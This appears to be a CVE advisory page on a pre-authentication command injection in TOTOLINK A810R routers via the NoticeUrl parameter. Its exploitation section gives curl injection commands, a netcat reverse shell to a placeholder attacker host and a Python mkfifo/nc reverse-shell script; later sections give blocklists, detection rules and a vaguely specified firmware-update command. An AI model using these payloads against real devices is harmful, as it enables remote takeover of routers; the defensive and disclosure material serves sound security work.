TOTOLINK A810R, Remote Command Execution, CVE-2025-28137 (Critical)

How the CVE Works

The CVE-2025-28137 vulnerability in TOTOLINK A810R routers (V4.1.2cu.5182_B20201026) allows unauthenticated attackers to execute arbitrary commands via the `setNoticeCfg` function. The flaw exists because the `NoticeUrl` parameter is not properly validated and accepts malicious payloads without sanitization. By sending a specially crafted HTTP request, an attacker can inject OS commands that are executed with root privileges. This occurs because the firmware fails to validate user-supplied input before passing it to system shell commands, leading to pre-auth remote code execution (RCE).

DailyCVE Form

Platform: TOTOLINK A810R
Version: V4.1.2cu.5182_B20201026
Vulnerability: Pre-auth RCE
Severity: Critical
Date: 04/15/2025

What Undercode Say:

Exploitation

1. Crafting the Payload:

curl -X POST "http://<TARGET_IP>/cgi-bin/setNoticeCfg" -d "NoticeUrl=;$(echo 'malicious_command')"

2. Reverse Shell Execution:

curl -X POST "http://<TARGET_IP>/cgi-bin/setNoticeCfg" -d "NoticeUrl=;nc -e /bin/sh <ATTACKER_IP> <PORT>"

3. Exploit Automation:

import requests
target = "http://192.168.1.1"
payload = ";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f"
requests.post(f"{target}/cgi-bin/setNoticeCfg", data={"NoticeUrl": payload})

Protection

1. Firmware Update:

wget https://vendor-patch/totolink_a810r_fix.bin && flash-firmware.sh

2. Input Sanitization:

import re

def sanitize_input(input_str):
    # Strips only ';', '&' and '|'. Other shell metacharacters such as
    # backticks, "$(...)", newlines and redirection operators are left intact,
    # so this is a partial blocklist, not a complete fix.
    return re.sub(r"[;&|]", "", input_str)

3. Network Mitigation:

iptables -A INPUT -p tcp --dport 80 -m string --string "setNoticeCfg" --algo bm -j DROP

Detection

1. Log Analysis:

grep "setNoticeCfg" /var/log/httpd.log | grep -E "[;&|]"
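Added example for Protection step 2 and Detection step 1 above; this is not code from the page or from TOTOLINK. It reproduces the blocklist from step 2 beside an allowlist validator for `NoticeUrl` (the character sets and URL rules are assumptions, since the firmware's own handling of the parameter is not documented here) and a helper that applies the validator to a percent-decoded value as it would appear in a request log, which catches encoded and `$( )`/backtick payloads that a plain `grep "[;&|]"` misses.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# The page's blocklist, reproduced unchanged so the test below can show what
# slips past it: anything other than ; & | goes through untouched.
def sanitize_blocklist(input_str):
    return re.sub(r"[;&|]", "", input_str)

# Assumed allowlist for a hardened validator (illustrative, not TOTOLINK code):
# an absolute http(s) URL whose host, path and query use only these characters.
# Shell metacharacters (; | & $ ` ( ) space, newline) are never in the sets, so
# they are rejected rather than "cleaned". '&' is excluded from the query on
# purpose; relax that only if the value is guaranteed never to reach a shell.
_HOST = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
_PATH = re.compile(r"^[A-Za-z0-9\-._~/]*$")
_QUERY = re.compile(r"^[A-Za-z0-9\-._~/=]*$")

def is_safe_notice_url(value, max_len=256):
    """Return True only if value is a structurally valid, allowlisted URL."""
    if not isinstance(value, str) or not value or len(value) > max_len:
        return False
    if any(not 0x21 <= ord(c) <= 0x7E for c in value):  # controls, space, non-ASCII
        return False                                    # (checked before urlsplit,
    try:                                                #  which strips \t \r \n)
        parts = urlsplit(value)
        parts.port                                      # ValueError on a bad port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username or parts.password or parts.fragment:
        return False
    return (_HOST.match(parts.hostname) is not None
            and _PATH.match(parts.path) is not None
            and _QUERY.match(parts.query) is not None)

def flag_logged_value(raw_param_value):
    """Detection helper: decode a NoticeUrl value as it appears in a request
    log (form/percent-encoded) and return True if the validator rejects it.
    Unlike grep "[;&|]", this also catches encoded or $( )/backtick payloads."""
    return not is_safe_notice_url(unquote_plus(raw_param_value))
```

A value that passes the validator must still be handed to the program that uses it as a separate argument, never interpolated into a shell command string.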

2. YARA Rule:

rule TOTOLINK_RCE {
    strings:
        $s = "NoticeUrl=;"
    condition:
        $s
}

3. Snort Rule:

alert tcp any any -> $HOME_NET 80 (msg:"TOTOLINK RCE Attempt"; flow:to_server,established; content:"setNoticeCfg"; content:"NoticeUrl=;"; sid:1000001; rev:1;)

Post-Exploitation

1. Persistence Check:

crontab -l | grep -iE "nc|sh"

2. Backdoor Removal:

rm /etc/cron.d/backdoor && killall -9 malicious_process

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
